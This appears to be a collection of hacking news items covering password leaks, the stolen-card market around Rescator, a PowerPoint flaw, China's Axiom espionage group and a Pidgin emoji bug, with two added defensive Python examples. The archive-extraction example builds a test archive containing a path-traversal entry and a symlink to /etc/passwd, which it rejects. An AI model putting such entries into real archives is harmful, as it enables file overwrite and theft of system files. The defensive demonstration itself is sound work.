Sure, I got $120 with my Bitcoin address, but when you consider how much time was spent acquiring this stuff (I'm not the hacker, just a collector), and the money (I paid a lot via Bitcoin as well to get certain sets when this stuff was being privately traded on Friday/Saturday) I really didn't get close to what I was hoping for.
We're seeing more and more passwords leak online. Amateur developers aren't stepping up password security, and existing leaks continue to resurface. While the information made public is often several years out of date (many of the emails posted along with the Dropbox passwords were deactivated in 2012), it's still valuable to hackers compiling large lists of email addresses and passwords to be used in attacks against other sites.
And, just in case it isn't clear, this is your fault, too: If you're using the same passwords over and over with different apps then hackers don't need to get into Apple or Facebook's servers to find them. They simply identify the smaller apps with the weakest password security.
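The attack pattern this piece describes, replaying credentials stolen from one site against another, leaves a recognisable shape in a login log: one source tries many different usernames in a short span and most attempts fail. The following is an added example, not code from the article or from any of the companies named in it; it runs a simple sliding-window detector over a few constructed log lines (the four-field log format, the thresholds and the IP addresses are all assumptions) and lists the accounts that did accept a password from a flagged source, which are the ones a defender would force to reset.

```python
"""Credential-stuffing detector over constructed auth log lines.

Added example, not from the article. Flags source IPs that try many
distinct usernames with a low success ratio inside a short window,
the login shape that replayed third-party password dumps produce.
"""
from __future__ import annotations

from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta

# Constructed sample log (assumed format: ISO timestamp, source IP, username, result).
SAMPLE_LOG = """\
2014-10-14T09:00:01 203.0.113.7 alice FAIL
2014-10-14T09:00:02 203.0.113.7 bob FAIL
2014-10-14T09:00:02 203.0.113.7 carol OK
2014-10-14T09:00:03 203.0.113.7 dave FAIL
2014-10-14T09:00:03 203.0.113.7 erin FAIL
2014-10-14T09:00:04 203.0.113.7 frank FAIL
2014-10-14T09:00:05 203.0.113.7 grace FAIL
2014-10-14T09:00:06 203.0.113.7 heidi FAIL
2014-10-14T09:01:00 198.51.100.9 alice FAIL
2014-10-14T09:01:05 198.51.100.9 alice FAIL
2014-10-14T09:01:20 198.51.100.9 alice OK
2014-10-14T12:00:00 192.0.2.44 bob OK
"""


@dataclass
class LoginEvent:
    ts: datetime
    ip: str
    user: str
    ok: bool


def parse_log(text: str) -> list[LoginEvent]:
    """Parse the constructed four-field log format into LoginEvent records."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        ts, ip, user, result = line.split()
        events.append(LoginEvent(datetime.fromisoformat(ts), ip, user, result == "OK"))
    return events


def detect_stuffing(events: list[LoginEvent], window: timedelta = timedelta(minutes=5),
                    min_users: int = 5, max_success_ratio: float = 0.5) -> dict:
    """Return {ip: (distinct_users, attempts, successes)} for every source IP that,
    within some `window`, tried at least `min_users` distinct usernames and had a
    success ratio at or below `max_success_ratio` (thresholds are assumptions).
    A user retrying their own password from one IP does not trip this."""
    by_ip: dict[str, list[LoginEvent]] = defaultdict(list)
    for e in sorted(events, key=lambda e: e.ts):
        by_ip[e.ip].append(e)

    flagged: dict = {}
    for ip, evs in by_ip.items():
        start = 0
        for end in range(len(evs)):
            # Slide the window start forward until it spans at most `window`.
            while evs[end].ts - evs[start].ts > window:
                start += 1
            chunk = evs[start:end + 1]
            users = {e.user for e in chunk}
            successes = sum(e.ok for e in chunk)
            if len(users) >= min_users and successes / len(chunk) <= max_success_ratio:
                best = flagged.get(ip)
                if best is None or len(users) > best[0]:
                    flagged[ip] = (len(users), len(chunk), successes)
    return flagged


def accounts_to_reset(events: list[LoginEvent], flagged: dict) -> set[str]:
    """Accounts whose password was accepted from a flagged source: their
    credential is confirmed reused somewhere and should be reset."""
    return {e.user for e in events if e.ip in flagged and e.ok}


if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    hits = detect_stuffing(evs)
    print("flagged sources:", hits)
    print("force reset:", accounts_to_reset(evs, hits))
```

The thresholds are deliberately loose for a twelve-line sample; on real traffic they would be tuned against the normal rate of distinct usernames per source, and the same logic works keyed on user-agent or ASN instead of a single IP.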
Hackers have their very own underground market for buying and selling our stolen data, and it's only becoming more sophisticated.
According to the RAND Corporation's most recent report on cybercrime, the hackers' black market first emerged in Warsaw Pact countries in the late 1980s when the countries' many programmers and mathematicians suddenly found themselves out of work. The market was paper-based instead of cyber and revolved mainly around identity theft. Hackers usually acted alone.
The chart below, also taken from the RAND report, shows just how far that market has come. While most hacker activity still occurs in Russia and Eastern Europe, the hackers' marketplace is now dominated by more disciplined, organized, and structured groups with specialized targets and advanced hacker toolkits.
According to the RAND report, cybercriminals will continue to update their tools as it becomes harder for them to hack into our computers.
RAND acknowledges that people will likely become more savvy about cybersafety and install more encryption and protection measures onto their devices. However, cybercriminals will update their tools to keep up with these advances.
As the graphic below shows, the black market has also taken on a fairly rigid hierarchical structure as more people have gotten involved.
Since the 1980s, the level of technical knowledge needed to implement a cyber attack has declined. Now, almost any computer-literate person can enter the market. This has caused more and more people with varying levels of hacking abilities to enter into the market looking for "freelance" work and hackers-for-hire.
The hierarchy is eerily similar to that of the illegal drug trade. Anyone can be a mule, but getting to the top requires personal connections and a good reputation. In certain respects, reports RAND, the black market can be even more profitable than the illegal drug trade: goods and services can be distributed worldwide with the click of a button, leading to direct and immediate end results.
Between December 2013 and February 2014, a high-profile seller named Rescator sold over 5 million stolen credit cards. That's a giant figure. Group-IB reports that in the last year the marketplace has only seen 5.5 million new stolen cards listed, meaning that Rescator dominates the site.
But it's not just the SWIPED card site that Rescator operates on. He also runs his own illegal marketplaces for card data, including rescator.so, rescator.cc, rescator.la, among others.
Being a major player in the stolen credit card industry does make an individual more vulnerable to being hacked themselves. Softpedia reports that one of Rescator's sites was hacked in March and defaced with a message and a Will Smith music video.
Here's what the site looked like after it had been hacked:
Rescator is also connected to the 2013 credit card hack that affected up to 70 million Target customers. His username is found in the source code of Kaptoxa, the malware program that hackers used to gain access to Target's point of sale systems and steal the credit card data.
A 2013 investigation by journalist Brian Krebs led him to discover a man living in Ukraine who may be Rescator: Andrey Hodirevski. Krebs traced Rescator's online post history and websites, using it to develop a picture of the hacker's life. He found photos of Hodirevski that matched photos of Rescator that had been uploaded to a variety of hacking forums. However, there's no proof that Hodirevski is Rescator.
Microsoft is scrambling to issue a Windows update after security researchers discovered a flaw in PowerPoint that hackers are using to seize control of computers.
Computerworld reports that the security problem affects all of the currently supported releases of Windows. The vulnerability was discovered by three Google employees and two McAfee Security staff.
Hackers can use the flaw to send a target an infected PowerPoint presentation. When opened, the file will ask for certain permissions to display it. Most users, unaware of the security risks from files downloaded over the internet, will simply click to grant permissions. Once they've done that, hackers have control over the computer and can quietly intercept its web traffic.
In an advisory notice on its site, Microsoft warned that it was aware of "limited, targeted attacks" taking place using the PowerPoint vulnerability. The company says it is currently investigating the problem, and it may issue a security update to protect users. In the meantime, Microsoft has released a security workaround to block infected PowerPoint files.
In a misguided marketing and fundraising stunt, the founder of a car rental app hacked into the voice mail of angel investor Jason Calacanis and changed the message to promote his company.
“My whole life has been focused around using new and experimental methods to promote ideas,” he wrote. “Therefore, when we decided to raise a new round for our startup, I knew we had to do something unique if we wanted to get attention.”
“Hey guys, we temporarily borrowed Jason Calacanis’ voicemail,” he says on the message.
Well, attention he got.
Zolty posted a link to the Medium post on Hacker News which apparently was also removed by administrators. Hacker News readers were not amused.
“Ethical quandaries aside (of which there are several) for a moment, I think this strategy speaks poorly of the startup,” said one comment. “What type of signal does it send to prospective investors that you feel it’s necessary to pull illegal stunts in order to gain attention for your round?”
Initially, Calacanis was surprised.
Insane. Someone hacked my voicemail and changed my outgoing message to get me to invest. http://t.co/PTtjq289bX
Zolty was part of the Winter 2013 Y Combinator batch for another startup, BeatDeck. Finding himself on the wrong end of a backlash, Zolty also apologized to Calacanis.
I just wanted to take a moment to sincerely apologize to @jason publicly. Been in contact, he's a great sport, and I admire him so much.
South Korea's spy agency said on Wednesday that North Korea used infected mobile games to hack the phones of over 20,000 South Koreans.
The Korea Times reports that the National Intelligence Service has accused the North Korean government of using its hacker army to disguise spying software as mobile apps. The games were linked to on websites popular in South Korea, and people then downloaded the apps.
The South Korean government hasn't released details on the hacked apps, which it now says it has removed.
However, nknews.org recently reported on a mobile game that does originate from North Korea. Nice Pigs is alleged to have been created by a North Korean citizen living abroad to gain IT training that will help the country. There's no suggestion that Nice Pigs contained malware, but it does show that there are app developers working for the North Korean government.
North Korea has consistently denied launching cyberattacks on South Korea. Instead, it says that any reports of the country's hacker army are fabrications intended to increase tension on the border between the countries.
A security researcher has discovered a vulnerability in Samsung's "Find My Mobile" feature that could let hackers interfere with phones over the internet.
The Find My Mobile service lets Samsung customers track their devices, and lock or erase them if they get stolen. However, The Register reports that Mohamed Baset discovered that Samsung doesn't properly check where requests to Find My Mobile come from. This means that hackers can impersonate the device owners and interfere with the account.
So what can hackers do with this security flaw? They can display a customized message on the phone screen, or find the phone's most recent location on a map. A hacker who attacked someone through the service could also force phones to ring on full volume for a minute, or even erase all data on the phone.
In an email to Business Insider, Samsung acknowledged the security flaw, but claimed that it had been fixed with a security patch on October 13.
Baset uploaded a video to YouTube showing just how easy it is to hack into Samsung phones using Find My Mobile.
The National Institute of Standards and Technology examined the hack, and issued this statement:
The Remote Controls feature on Samsung mobile devices does not validate the source of lock-code data received over a network, which makes it easier for remote attackers to cause a denial of service (screen locking with an arbitrary code) by triggering unexpected Find My Mobile network traffic.
A Chinese intelligence unit carried out a massive cyber espionage program that stole vast quantities of data from governments, businesses and other organizations, security analysts who uncovered the operation said Thursday.
The activities of the Chinese unit called the Axiom group began at least six years ago and were uncovered by a coalition of security firms this month.
Cyber sleuths traced Axiom attacks to the 2009 cyber operation against Google in China and other US companies known as Operation Aurora.
The group was also linked to a Chinese hacking program that targeted dissidents and opposition groups known as GhostNet. More recent Axiom attacks took place against Japan, the US Veterans of Foreign Wars, and US think tanks.
In the past two weeks, 43,000 computer networks at nearly 1,000 organizations were cleaned of multiple types of cyber espionage spyware from Axiom cyber spies, including 180 highly sophisticated computer penetrations at key Chinese targets that employed a program called Hikit that specializes in automated data theft.
Investigators found that the Chinese used up to four different types of malicious software in a single information-stealing operation, and a total of nine different types of spying malware overall, ranging from rudimentary to very sophisticated.
The group conducting the attacks is “a truly advanced hacker,” said Zachery Hanif, a cyber security expert with Novetta, a Virginia-based company that was one of the first to identify Axiom cyber attacks.
“We believe they are a highly sophisticated and very prolific cyber espionage team,” Hanif said in an online briefing for reporters. “We certainly have a moderate to high degree of confidence that the [Axiom] tasking is part of the Chinese intelligence apparatus.”
An FBI alert issued Oct. 15 bolsters the commercial findings. The alert states that the Bureau has high confidence that the new unit is “a group of Chinese government affiliated cyber actors who routinely steal high value information from US commercial and government networks through cyber espionage.”
The FBI said the new group differs from the Chinese military hacking unit known as PLA Unit 61398 by operating in an “exceedingly stealthy and agile” fashion, compared to the military unit.
“This Chinese government affiliated group previously documented by private sector reports by the names of Operation Deputy Dog, Snowman, Ephemeral Hydra, APT17, Bit9, Google security alerts and parts of Hidden Lynx, has heavily targeted the high tech information technology industry including microchip, digital storage and networking equipment manufacturers, as well as defense contractors in multiple countries and multinational corporations,” the FBI said.
Hanif said attributing the Axiom spying to a specific Chinese intelligence agency is difficult because of problems involved in making direct attributions in cyberspace to specific actors.
But during the briefing Hanif said indicators of Axiom revealed activities that were aligned with Chinese government five-year economic and technological development plans.
Hanif said detailed analysis of software and digital attack methods of the group against specific targets reveals the activities are “heavily aligned with what’s been published as strategic interests for the Chinese government.”
China’s targets included Asian and Western governments, specifically communications agencies, aerospace and space research, law enforcement, personnel management, and government auditing and internal affairs.
Using proxy servers in Hong Kong, Taiwan, Japan, South Korea, the United States and Europe, Axiom cyber spies sought data and technology from the following targets:
♦ Electronics and integrated circuits
♦ Network equipment manufacturers
♦ Internet service companies
♦ Software vendors
♦ News media and journalism organizations
♦ Non-governmental organizations
♦ International consulting and analysis firms
♦ International law firms
♦ Telecommunications firms
♦ Manufacturing conglomerates
♦ Venture capital firms
♦ Energy companies
♦ Meteorological services
♦ Cloud computing firms
♦ Pharmaceutical firms; and
♦ US academic institutions
Axiom is the first published disclosure of civilian Chinese cyber spying.
A Chinese military intelligence group known as the Third Department of the People’s Liberation Army has been identified in the past as directing major Chinese cyber spying units in U.S. cyber attacks.
Analysis of Axiom’s activities reveals that the new unit is likely a part of China’s Ministry of State Security (MSS), the powerful Communist Party-controlled political police and intelligence service that was modeled after the Soviet Union’s KGB.
A Novetta report on Axiom said the group conducted cyber operations against perceived opponents of the Beijing regime located both abroad and in China, key indicators of MSS sponsorship.
The report did not identify specific victims but published reports going back to 2009, as well as the attacks on Google and other U.S. companies, reveal that many of the companies were Fortune 500 firms.
US government agencies that were hacked by the Chinese also were not identified.
To highlight the sophistication of the group, the Novetta report reveals Axiom employed six different types of cyber intelligence specialties: reconnaissance specialists, initial cyber break-in experts, specialists who navigated within targeted networks, experts who set up special systems inside compromised networks, information specialists who identified and stole data, and those who helped maintain clandestine access over long periods of time.
Brian Bartholomew, a cyber security expert with iSight Partners, a company that took part in a coalition of security firms that exposed and countered Axiom operations, said that beginning in mid-October the coalition launched an effort to expunge Axiom’s malware in order to degrade the group’s activities.
“The hope was to throw a large wrench into their engine, and cause them to take the time to basically take a step back and hit the reboot button and spend a large amount of resources to fix things and get back up and running,” Bartholomew said.
Security firms involved in the counter-Axiom effort, dubbed Operation SMN, included the security firms Bit9, Cisco Systems, F-Secure, FireEye, Tenable, ThreatConnect, ThreatTrack, and Volexity, in addition to Novetta and iSight.
The joint effort was successful in rooting out a lot of Axiom malware, Bartholomew said.
As a result, the Chinese cyber unit is now being forced to develop new malware and to find new compromised networks that it can use as proxies, along with developing new victims to target, he said.
The companies and entities that were infected by the Chinese malware were notified of the Axiom attack.
Security researchers at Cisco discovered a vulnerability in a popular messaging client that allowed hackers to use malicious emoji and mess with the files on a computer.
A bug in Pidgin's code meant that hackers could sneak instructions into a pack of emoji. Anybody downloading new smiley faces to use for chat could have been letting hackers modify files on their computer, or even create new ones.
Pidgin released a security update that fixed the security bug, but it is unknown whether any hackers took advantage of it.
This wasn't the first time a vulnerability has been found in emoji. A similar bug was discovered in the same chat client in 2012.
Hackers looking to gain access to a computer can use bundles of emoji to sneak in extra files. While that might sound bizarre, it's actually part of a common hacker tactic.
Hackers often trick users into downloading files, disguising them as legitimate software downloads. Then, once the files have been downloaded, the user has to approve their installation. Most people don't check too closely when installing new programs, and so they regularly grant new apps and programs access to important parts of their computer.
That is exactly what happened with the recent iWorm bug, which spread to more than 17,000 Mac computers. It was reported that the virus spread through fake Adobe Photoshop downloads uploaded to popular file-sharing site The Pirate Bay.
When it comes to emoji, we are used to installing and downloading new bundles of colourful graphics. Whether through a new iOS release, updated Facebook stickers, or a bundle of faces for a chat program, everyone from parents to young children knows to click a download button and install emoji. And if programs have security breaches, that's exactly how hackers can access computers.
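The Pidgin story above turns on a downloaded bundle of graphics being able to create or modify files elsewhere on the computer. The article does not say which defect in Pidgin allowed that, so the following is a general added example, not Pidgin's code: it shows the defence against the most common way an archive gets files written outside its destination, entries whose names walk out of the extraction directory with `..` or point a symlink at a system path. The archive is constructed in memory, the entry names and contents are invented, and extraction is done by hand (reading each approved member and writing it) so that nothing the archive says about paths or link targets is trusted.

```python
"""Safe extraction of an untrusted theme or emoji-pack archive.

Added example, not Pidgin's code. The article does not state how the
Pidgin smiley-pack bug wrote files; this demonstrates the general defence
against path traversal and symlink entries in an untrusted archive.
"""
import io
import os
import tarfile
import tempfile


def build_sample_archive() -> bytes:
    """Constructed sample: two benign theme entries, one traversal entry
    and one symlink entry (all names and contents are invented)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, data in [
            ("theme/theme", b"[Icons]\nsmile=smile.png\n"),
            ("theme/smile.png", b"\x89PNG-placeholder"),
            ("../../outside.txt", b"would land outside the theme dir"),
        ]:
            info = tarfile.TarInfo(name=name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
        link = tarfile.TarInfo(name="theme/link")   # symlink to a system file
        link.type = tarfile.SYMTYPE
        link.linkname = "/etc/passwd"
        tar.addfile(link)
    return buf.getvalue()


def is_safe_member(member: tarfile.TarInfo, dest: str) -> bool:
    """Accept only regular files whose resolved path stays inside `dest`."""
    if not member.isfile():            # rejects symlinks, hardlinks, devices
        return False
    if os.path.isabs(member.name):
        return False
    real_dest = os.path.realpath(dest)
    target = os.path.realpath(os.path.join(real_dest, member.name))
    return os.path.commonpath([real_dest, target]) == real_dest and target != real_dest


def safe_extract(archive: bytes, dest: str):
    """Extract approved members by copying their bytes ourselves.
    Returns (accepted_names, rejected_names)."""
    accepted, rejected = [], []
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r") as tar:
        for member in tar.getmembers():
            if not is_safe_member(member, dest):
                rejected.append(member.name)
                continue
            target = os.path.realpath(os.path.join(dest, member.name))
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with tar.extractfile(member) as src, open(target, "wb") as out:
                out.write(src.read())
            accepted.append(member.name)
    return accepted, rejected


def demo():
    """Extract the constructed archive into a temp dir and report what
    was accepted, what was rejected, and what actually reached disk."""
    with tempfile.TemporaryDirectory() as dest:
        accepted, rejected = safe_extract(build_sample_archive(), dest)
        on_disk = sorted(
            os.path.relpath(os.path.join(root, f), dest).replace(os.sep, "/")
            for root, _dirs, files in os.walk(dest)
            for f in files
        )
    return accepted, rejected, on_disk


if __name__ == "__main__":
    print(demo())
```

The check compares resolved real paths rather than string prefixes, so `theme/../../x` and symlinked destination directories are handled, and because members are written by hand rather than with `extractall`, the archive's own type, mode and link metadata never reach the filesystem.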